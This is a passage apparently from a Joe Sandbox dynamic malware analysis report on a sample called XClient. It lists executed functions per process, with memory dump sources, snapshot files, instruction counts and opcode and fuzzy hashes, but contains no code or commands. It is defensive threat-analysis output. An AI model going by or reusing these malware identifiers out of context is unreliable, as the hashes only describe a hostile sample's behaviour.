                      • Opcode Fuzzy Hash: 43aeb10d008f66eb15092c04babc2d5a105de5692c8ef57a111f213e9cdeb5f7
                      • Instruction Fuzzy Hash: EA62E661B29A594FE798FB7888756B977D2FF9C300F4405B9E01DC32D7DE28A8428781
                      Function 00007FFD9B8B0730 Relevance: .2, Instructions: 241COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cb45995b91574b02903eed342a9544c00ffe163c323dd53f957003db2c1a011
                      • Instruction ID: 4f11872402b21a909e3777ecf71c759d134fb10aa2b58334775b097755468a7a
                      • Opcode Fuzzy Hash: 6cb45995b91574b02903eed342a9544c00ffe163c323dd53f957003db2c1a011
                      • Instruction Fuzzy Hash: 634118E2B095998FD34AB768FC759E87F61EF48214B8445F2D05D873CBED3825428782
                      Function 00007FFD9B8B17E1 Relevance: .2, Instructions: 187COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d01f3f508d4b3f75c93edafafff6f7dcb28488229271226e2df27b1ab8d61b3
                      • Instruction ID: 92350e31320df6da92f8d6e30026adeb8003a292f3a939590199bc9c1c4b69bb
                      • Opcode Fuzzy Hash: 1d01f3f508d4b3f75c93edafafff6f7dcb28488229271226e2df27b1ab8d61b3
                      • Instruction Fuzzy Hash: 40510310B1E6C90FD756AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
                      Function 00007FFD9B8B07A8 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a380419a7dff6102fc5e7f6650df8c7191f98788f361bfa941b154ecc969a2e
                      • Instruction ID: 45a6947c9c4f93c4e81dda8310c63c14a57256f3f10ee52cd1ad7975730d7b1f
                      • Opcode Fuzzy Hash: 8a380419a7dff6102fc5e7f6650df8c7191f98788f361bfa941b154ecc969a2e
                      • Instruction Fuzzy Hash: DF31B4E1759A894FD389EB28E4B09E9BF71EF8C201BC044A5D019C33DBDD3869018782
                      Function 00007FFD9B8B04E0 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f2901a624b8f7ecd92b3c0228715d2beb82d823769d2a414708d58a78d2cbcd6
                      • Instruction ID: e2e7548131699e6b9c362aef56c1bf4e4d25e8e19f66c41a989726bbd08823e3
                      • Opcode Fuzzy Hash: f2901a624b8f7ecd92b3c0228715d2beb82d823769d2a414708d58a78d2cbcd6
                      • Instruction Fuzzy Hash: DF31EA21B189490FD798FB2C987A679A2C1EF9C315F0501BEE00EC72EBDE689C018741
                      Function 00007FFD9B8B09A9 Relevance: .1, Instructions: 112COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 417d4731ccda7f43aba10b779d0807ce6a110deb51bfa0b8e1883f2be18cb688
                      • Instruction ID: b43a77422da57a4e7fd747e2456d0bea92e6a77c51bf74768cd7a1375c0de978
                      • Opcode Fuzzy Hash: 417d4731ccda7f43aba10b779d0807ce6a110deb51bfa0b8e1883f2be18cb688
                      • Instruction Fuzzy Hash: 2841C370A18A594FDB49EB78D861AED7BB1FF88300F9005B5D009D33D6DE38A801C781
                      Function 00007FFD9B8B0B48 Relevance: .1, Instructions: 82COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction ID: 7803e422d1136a6b6b5d3c874e7e2f1abf1f0e2d43eb12486e7901e2174a0cad
                      • Opcode Fuzzy Hash: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
                      Function 00007FFD9B8B1981 Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 457c96d93915e53c0993e45d39756a15bd39a632904e065f926e272037147606
                      • Instruction ID: e2c1afba78aae1eeecd4071edddba1da76b646a8c8fbf902b3c6338282df8648
                      • Opcode Fuzzy Hash: 457c96d93915e53c0993e45d39756a15bd39a632904e065f926e272037147606
                      • Instruction Fuzzy Hash: D4016D52B1EAA90FF751737878215727FE0DF9A261B4905B7F888CA1A7E8085A4143D2

                      Executed Functions

                      Function 00007FFD9B890C5E Relevance: 1.0, Instructions: 1022COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dada08eed77c929611449963c8fe238b614173b4f504e970fb0b04b50caac592
                      • Instruction ID: 9c635304fa9f536ebae9f4d166cafbb72c8471d053cbbf6010834de7fc7448af
                      • Opcode Fuzzy Hash: dada08eed77c929611449963c8fe238b614173b4f504e970fb0b04b50caac592
                      • Instruction Fuzzy Hash: D162EB61B1DA494FEB58FB7C947A6BDB7D2EF98300F4405B9E05DC32DADD28A8428341
                      Function 00007FFD9B890730 Relevance: .2, Instructions: 241COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a441b137bed92704be88a2ecd4bcae9d3cb2c529e0b5fd434512fbf4e0563cf8
                      • Instruction ID: 08e46f1d9f350818ad1966a6d3f45b2aca67388d3cb7ba2f8a02a448296de20a
                      • Opcode Fuzzy Hash: a441b137bed92704be88a2ecd4bcae9d3cb2c529e0b5fd434512fbf4e0563cf8
                      • Instruction Fuzzy Hash: D641E362B0D5598BD709BB68BC7A8ECBF61EF54214B8441F2D45D872CFED3824468782
                      Function 00007FFD9B8917E1 Relevance: .2, Instructions: 187COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae5d1719c8dfefd8f8b47f3ac489e0f48c0e36f4f247a478b91140b92590e98b
                      • Instruction ID: c4af62a873dd3ca7d91dabbc8d9c9f2cdedf7c5130ca0a1886fb3ea24a3338cf
                      • Opcode Fuzzy Hash: ae5d1719c8dfefd8f8b47f3ac489e0f48c0e36f4f247a478b91140b92590e98b
                      • Instruction Fuzzy Hash: 68510120B1E6C90FDB96AB7C48756796FD1DF8A219B0901FBE099C71EBDE185806C342
                      Function 00007FFD9B8907A8 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a4acc0945755c0c84b7c858afcc836cb53ad86e09e6d2f0b938731e1bde2f04a
                      • Instruction ID: 81ccf82b6b92fcb977a95ed97545442a38a96e09e1621485c0a5c51756a51ac2
                      • Opcode Fuzzy Hash: a4acc0945755c0c84b7c858afcc836cb53ad86e09e6d2f0b938731e1bde2f04a
                      • Instruction Fuzzy Hash: 9031946175DA894FD348EB28A4B68BDBFB1FFA8200BC045A5D419C33DEDD3469098752
                      Function 00007FFD9B8904E0 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7825b186defd27461806548f5b9e70a4fdc26c09c56b253820766bf99d6c553
                      • Instruction ID: f8f6d651b5bce7f33e8898340aa53565545034b5d4d7869aa7c4d98d5b8a3ccc
                      • Opcode Fuzzy Hash: b7825b186defd27461806548f5b9e70a4fdc26c09c56b253820766bf99d6c553
                      • Instruction Fuzzy Hash: 1131CA21B1C9490FEB98FB2C587A679A6C1EF9C355F0505BEE05EC32EBDE685C418341
                      Function 00007FFD9B8909A9 Relevance: .1, Instructions: 113COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b19b07829332da02dfc6e782edbf1d8cb81e4b222e67d954a935f704a0f192d
                      • Instruction ID: 301d0322136a7bd89bc80b858811f044dcf93d5c5ad7e766299f447d38b23387
                      • Opcode Fuzzy Hash: 0b19b07829332da02dfc6e782edbf1d8cb81e4b222e67d954a935f704a0f192d
                      • Instruction Fuzzy Hash: 6F419431A18A4D4FDB48EB68D8656EDBBB1FF99300F5105B9D019D32DADE38A805C741
                      Function 00007FFD9B890B48 Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d46d89a385447af755cc829978e1d0872fd09819bfb657b38a39e342e0b37982
                      • Instruction ID: 8f797c8f4f07b99bbb34ea0e9846bedf703815ee3f59d788942a4f86c31a1698
                      • Opcode Fuzzy Hash: d46d89a385447af755cc829978e1d0872fd09819bfb657b38a39e342e0b37982
                      • Instruction Fuzzy Hash: D1215761F14D098BEB48BBBC586A7BC72D2FF98715F10017AE11DC32DADD28A8424341
                      Function 00007FFD9B891981 Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b3c869c5b6584b53b27e54bd8bdc135bed9cd367ee73050fe225b4f5b36688a
                      • Instruction ID: bcbbf097d8ea008e8f5c36bf88eb3b9b81fe3dce83a4845b82835f46f01c4fd0
                      • Opcode Fuzzy Hash: 3b3c869c5b6584b53b27e54bd8bdc135bed9cd367ee73050fe225b4f5b36688a
                      • Instruction Fuzzy Hash: 08016D16B0E6991FFB51776878215757FE0CBD6260B4905B7F8C9C60A7E8085A414392

                      Executed Functions

                      Function 00007FFD9B8B0C5E Relevance: 1.0, Instructions: 1021COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 805424396a6afc70c99d55ba5bd9e1f2b97e42606811afb77eff3629c80baf8e
                      • Instruction ID: 5d939faf02616f50a4d2be35351488f8993b73ef3a5388da496a1d4511e49000
                      • Opcode Fuzzy Hash: 805424396a6afc70c99d55ba5bd9e1f2b97e42606811afb77eff3629c80baf8e
                      • Instruction Fuzzy Hash: 8A62C821B29A594FE79CFB7C847567977D2FF98304F4401B9E05DC32DAED28A8428781
                      Function 00007FFD9B8B0730 Relevance: .2, Instructions: 241COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2daba5ffc3eba50ab693d800ea13eff49e9ab86cb921ca1917076337b3b1098f
                      • Instruction ID: e54ff6fcc93d05525d08a726fabc67fe4e5944b4b43c1a8379aaff7ad3f1b914
                      • Opcode Fuzzy Hash: 2daba5ffc3eba50ab693d800ea13eff49e9ab86cb921ca1917076337b3b1098f
                      • Instruction Fuzzy Hash: 60412821B085598BD74EBB68ACB58E87B72EF48318B8441F2D45D832CFFD3C25428792
                      Function 00007FFD9B8B17E1 Relevance: .2, Instructions: 187COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 93cc70c2c2b1b180ca2155ae6ad4a62022a99ba0b958b8f7e90b363a01dd8c8f
                      • Instruction ID: 93b0ea9e0567ceca73c2a3081dc5affbbea785c0f2324f9c85a39dcb7de89ad7
                      • Opcode Fuzzy Hash: 93cc70c2c2b1b180ca2155ae6ad4a62022a99ba0b958b8f7e90b363a01dd8c8f
                      • Instruction Fuzzy Hash: 4A510310B1E6C90FD796AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
                      Function 00007FFD9B8B07A8 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 390bcffb736dfcb70cd0eebd86ca16e1bebbef19b6c6bd5dfe5646f49424a6ae
                      • Instruction ID: 3e9baa77678e91136398e8cc784a8488d815b801868bef31afaa7889e3540719
                      • Opcode Fuzzy Hash: 390bcffb736dfcb70cd0eebd86ca16e1bebbef19b6c6bd5dfe5646f49424a6ae
                      • Instruction Fuzzy Hash: 8D319820B19A4D8FD78DF72894B58A9BF72EF883047C045A5D819C33DFED3869058762
                      Function 00007FFD9B8B04E0 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db067edef9015a5fc29d7870068136a3bba954b97c307c80b0ff9f0aae178bd0
                      • Instruction ID: edd8a2fa582c5176062a9003ffaaa99b872987b1322f4b4f034691d8a3d38c5d
                      • Opcode Fuzzy Hash: db067edef9015a5fc29d7870068136a3bba954b97c307c80b0ff9f0aae178bd0
                      • Instruction Fuzzy Hash: AD31FB21B1894D0FD798FB2C587A679A6C1EF9C315F0501BEE00EC72EBDE689C018741
                      Function 00007FFD9B8B09A9 Relevance: .1, Instructions: 112COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f979c5aa0f76b53f6c3ee3b58a1743f739252130b4128edceca3c2a1db7db4e
                      • Instruction ID: 61f8ee649642f97c9d48c015b65add8bc1f5b68a6ca337fef753fd3b7d3f0078
                      • Opcode Fuzzy Hash: 1f979c5aa0f76b53f6c3ee3b58a1743f739252130b4128edceca3c2a1db7db4e
                      • Instruction Fuzzy Hash: 4441B430A18A1D8FDB49EB78C861AEDB7B2FF99300F9005B5D019D32DADE386841C751
                      Function 00007FFD9B8B0B48 Relevance: .1, Instructions: 82COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction ID: 7803e422d1136a6b6b5d3c874e7e2f1abf1f0e2d43eb12486e7901e2174a0cad
                      • Opcode Fuzzy Hash: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
                      Function 00007FFD9B8B1981 Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed32f0ee0d045c5981a8e7f762cc3293df1a6440b127dc65d3b6951551b72e59
                      • Instruction ID: 5c8b96ac16d2ad7f010e9d856dcad4e153271735f96a20f35f43c97bf5bfda51
                      • Opcode Fuzzy Hash: ed32f0ee0d045c5981a8e7f762cc3293df1a6440b127dc65d3b6951551b72e59
                      • Instruction Fuzzy Hash: BA016D12B1EAA94FF351737868215727FF0CB9A260B0905B7F888CA0A7E8085A4143D2

                      Executed Functions

                      Function 00007FFD9B8A0C5E Relevance: 1.0, Instructions: 1022COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2150bcad261736f9877ed4f9918bf52681024abcd03b1a6b91c75c135606c095
                      • Instruction ID: 426aebd77ad2b3f55cad0f7f19d326d5e6780001668c67992bb956d25ae8b338
                      • Opcode Fuzzy Hash: 2150bcad261736f9877ed4f9918bf52681024abcd03b1a6b91c75c135606c095
                      • Instruction Fuzzy Hash: 1562F861B29A494FE768FB7C887567DB6D2FF98300F4505BDE05EC32D6DE28A8428341
                      Function 00007FFD9B8A0730 Relevance: .3, Instructions: 297COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b66672ab6aff8db00457340c4b6bb7b3d45c7e049cd0bbbd5b3de90e357bebf4
                      • Instruction ID: d7d7438648adbc74ab14e1adf56b051a6e9155529f897926bbc7988a0e94dd97
                      • Opcode Fuzzy Hash: b66672ab6aff8db00457340c4b6bb7b3d45c7e049cd0bbbd5b3de90e357bebf4
                      • Instruction Fuzzy Hash: 74514861B0855A8BD30DBB68BC758EC7F61EF4431479941F6D05DC32CBED3824428B82
                      Function 00007FFD9B8A07A8 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c8507986f123b66c3b2081a7af92c66bb17e05ebc8673a674a25f8c0da04d1ed
                      • Instruction ID: 686d92cb759ba4e575bcc2117e76b31ac9f1ea2283d9dc513c5e826a395c8334
                      • Opcode Fuzzy Hash: c8507986f123b66c3b2081a7af92c66bb17e05ebc8673a674a25f8c0da04d1ed
                      • Instruction Fuzzy Hash: FA31D420748A494FD75CEB28A8B08ADBF75EF88200BD544A9D01AC33CADE3468458B52
                      Function 00007FFD9B8A17E1 Relevance: .2, Instructions: 184COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e2e4790ada01148677f8fe9a11dc53057a7472d94e0bc9c69989e66e7bde5e76
                      • Instruction ID: 44506cd5678a768a9f31ff26d4c7fd4fe75fa480439bd8d734fd3ba7b79dc347
                      • Opcode Fuzzy Hash: e2e4790ada01148677f8fe9a11dc53057a7472d94e0bc9c69989e66e7bde5e76
                      • Instruction Fuzzy Hash: A051F110B1E6C90FD796AB784875675AFD1DF8B219B0900FBE099C71EBDD185806C352
                      Function 00007FFD9B8A04E0 Relevance: .1, Instructions: 134COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b957b077887ba727d7db1f8d1f3981daf4c663712164d1fd5374f25c445f5084
                      • Instruction ID: 9d95a7a74ce7a3294259f842e10476a7cebe42f602b35401839ed8281955153d
                      • Opcode Fuzzy Hash: b957b077887ba727d7db1f8d1f3981daf4c663712164d1fd5374f25c445f5084
                      • Instruction Fuzzy Hash: FB31D921B189490FDB98FB2C587A679A7C1EF9D315F0505BEE01EC32EBDE689C418341
                      Function 00007FFD9B8A09A9 Relevance: .1, Instructions: 113COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bb130fe91c820b28042e938445aaeed8dbee0941b89d3c2c467caec3e1d359e
                      • Instruction ID: 150d7013b7f407781f293610b667b41d2a4cd25810eda2b988d8fa95e02de357
                      • Opcode Fuzzy Hash: 1bb130fe91c820b28042e938445aaeed8dbee0941b89d3c2c467caec3e1d359e
                      • Instruction Fuzzy Hash: E341A330B18A0D8FDB48EBA89861AFD7BB1FF98300F9545B9D019D32D6DE38A841C751
                      Function 00007FFD9B8A0B48 Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d68f39ef713b8b6c935d6a740e7b18b37b3ba00f12b98bb8d7cc9dfe7d5bd1b9
                      • Instruction ID: 5965552b2b8381a4d713dcbeac19efb028c121aecb11e7b0a161cbb598113909
                      • Opcode Fuzzy Hash: d68f39ef713b8b6c935d6a740e7b18b37b3ba00f12b98bb8d7cc9dfe7d5bd1b9
                      • Instruction Fuzzy Hash: 87212761F149094BFB88BBBC586A7FC72D2EF98715F10417AE51DC32DADD28A8428351
                      Function 00007FFD9B8A1981 Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ebbb7f509d98e702b886392a977c44609bb65a540c81caf30944f369a0b87908
                      • Instruction ID: c8f2625205274d8f2db1a326cbd929affc071e520b9701cb736ab23b89961f69
                      • Opcode Fuzzy Hash: ebbb7f509d98e702b886392a977c44609bb65a540c81caf30944f369a0b87908
                      • Instruction Fuzzy Hash: AF018912B0E6490EF354772828615717BE0CB97220B0D05BBE888C60E7E8085A41C3A2